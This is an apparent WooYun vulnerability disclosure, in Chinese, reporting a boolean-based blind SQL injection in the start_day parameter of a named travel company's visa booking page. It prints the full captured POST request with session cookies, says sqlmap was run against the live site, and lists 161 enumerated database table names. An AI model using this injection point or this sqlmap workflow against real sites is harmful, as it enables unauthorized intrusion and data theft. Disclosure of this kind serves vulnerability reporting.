当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136826

漏洞标题:芒果网某站存在SQL注入漏洞之一(布尔型盲注)

相关厂商:芒果网

漏洞作者: Xmyth_夏洛克

提交时间:2015-08-25 14:12

修复时间:2015-08-30 14:14

公开时间:2015-08-30 14:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

23333

详细说明:

芒果网某分站在线订机票系统存在注入页面:
bj.mangocity.com/visa/online.jsp

在线订机票.png


存在注入的参数

存在注入的参数.png


抓到POST包

POST /visa/online.jsp?act=do HTTP/1.1
Host: bj.mangocity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://bj.mangocity.com/visa/online.jsp
Cookie: __ozlvd=1439444078; Hm_lvt_0b2665fd0279a4d150b6ccadb25603e8=1439444080; __utma=29435872.951864969.1439444083.1439444083.1439444083.1;
__utmz=29435872.1439444083.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=57D2CFE65451C267CAC6D936BB3027F9; Hm_lvt_c449fb62c2976a115c477bd115dd9384=1440480237;
Hm_lpvt_c449fb62c2976a115c477bd115dd9384=1440480237
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 439
quna1=%E6%96%B0%E5%8A%A0%E5%9D%A1&visa_type=%E5%BA%A6%E5%81%87%E6%97%85%E6%B8%B8&service=%E5%85%A8%E9%83%A8%E8%A1%8C%E7%A8%8B%E5%AE%89%E6%8E
%92%2C&countryonlinem=&countryonline=%E6%96%B0%E5%8A%A0%E5%9D%A1&visa_type=%E5%BA%A6%E5%81%87%E6%97%85%E6%B8%B8&service5=%E5%85%A8%E9%83%A8%E8%A1%8C%E7%A8%8B%E5%AE%89%E6%8E
%92&qty_item_1=1&start_month=1&start_day=1&end_month=1&end_day=1&user_name=123&mobile=13010204567&email=123%40qq.com&question=


放入sqlmap跑
start_day存在注入点,是布尔型盲注

布尔型盲注.jpg


漏洞证明:

涉及数据库3个:

涉及3个数据库.png


161个表

161个表.png


Database: ut7
[161 tables]
+---------------------------+
| account_info |
| call_post_set |
| comments |
| comments_reply |
| crm_info |
| dev_data_fields |
| dev_data_table |
| dev_input_field |
| dev_page_input |
| dev_template |
| fm_parameter |
| fm_parameter_set |
| fm_receivables_payables |
| g_accessory |
| g_fm_accounting |
| g_fm_advertisement |
| g_fm_inspect |
| g_fm_person_brokerage |
| g_sign_state |
| gather_document |
| gl_season_destination |
| gl_strategy |
| gl_strategy_page_block |
| hc_train_info |
| high_custom |
| hk_airlines_info |
| hk_flight_info |
| hk_models |
| hotel_basic_info |
| hotel_photo |
| hotel_price_info |
| hotel_room_info |
| income_expenses_single |
| insurance_company |
| insurance_info |
| jd_facility |
| jd_group_info |
| jd_hotel_info |
| jd_photo |
| jd_room_info |
| l_photo |
| member_log |
| mobile_web_page_block |
| monthly_balance |
| oa_appliance |
| oa_leave |
| oa_notice |
| oa_purchase |
| oa_purchase_log |
| oa_report_annul |
| oa_report_annul_log |
| oa_supplier |
| oa_userget |
| old_order |
| online_ask |
| optional_order |
| order_basic_info |
| order_checkseat |
| order_doc |
| order_file |
| order_finance_statistics |
| order_gathering |
| order_insurance |
| order_invoice |
| order_other_cost |
| order_outteam |
| order_pay |
| order_pay_log |
| order_pledge |
| order_reality_data |
| order_refund |
| order_remark |
| order_supplier |
| order_visit |
| order_visit_log |
| os_accessory_file |
| os_city |
| os_company |
| os_country |
| os_data_source |
| os_fileup |
| os_function |
| os_g_destination |
| os_g_trip_type |
| os_help |
| os_log |
| os_login_user |
| os_module |
| os_order |
| os_photo |
| os_province |
| os_suggest |
| os_system |
| pay_order |
| personal_quick |
| phone_to_callcenter |
| qc_car_info |
| qc_group_info |
| reg_member |
| reg_tables |
| remit_info |
| reply_question |
| scenic_info |
| scenic_photo |
| self_expense |
| set_of_book |
| sign_contract |
| sms_date |
| sms_log |
| sms_port |
| sort_table |
| strategy_article |
| strategy_aspect_info |
| strategy_destination_info |
| strategy_photo |
| strategy_web_column |
| system_seting |
| system_variable |
| t_ad |
| t_admin |
| t_article |
| t_base_trans |
| t_category |
| t_commen |
| t_gather |
| t_gatherhis |
| t_keywords |
| t_label |
| t_role |
| t_source |
| t_special |
| t_template |
| t_vote |
| t_voteitem |
| t_web_seting |
| tour_aspect |
| tour_basic_info |
| tour_basic_info_order |
| tour_destination |
| tour_price_info |
| tour_price_info_order |
| tour_schedule_info |
| tour_shoping |
| tour_stard_info |
| tour_time |
| trip_type |
| user_department |
| user_msg |
| visa_basic_info |
| visa_reservation |
| visa_test |
| visitor_list |
| web_article |
| web_column |
| web_custom |
| web_email_subscriptions |
| web_error_page |
| web_friendly_link |
| web_page_block |
| web_set_tour_aspect |
| web_set_tour_destination |
+---------------------------+

修复方案:

过滤

版权声明:转载请注明来源 Xmyth_夏洛克@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-30 14:14

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-30 15:11 | Security ( 路人 | Rank:25 漏洞数:9 )

    神话2个字太刺眼了!

  2. 2015-08-30 20:03 | Xmyth_夏洛克 ( 普通白帽子 | Rank:477 漏洞数:62 | 啥都不会)

    @Security 2333333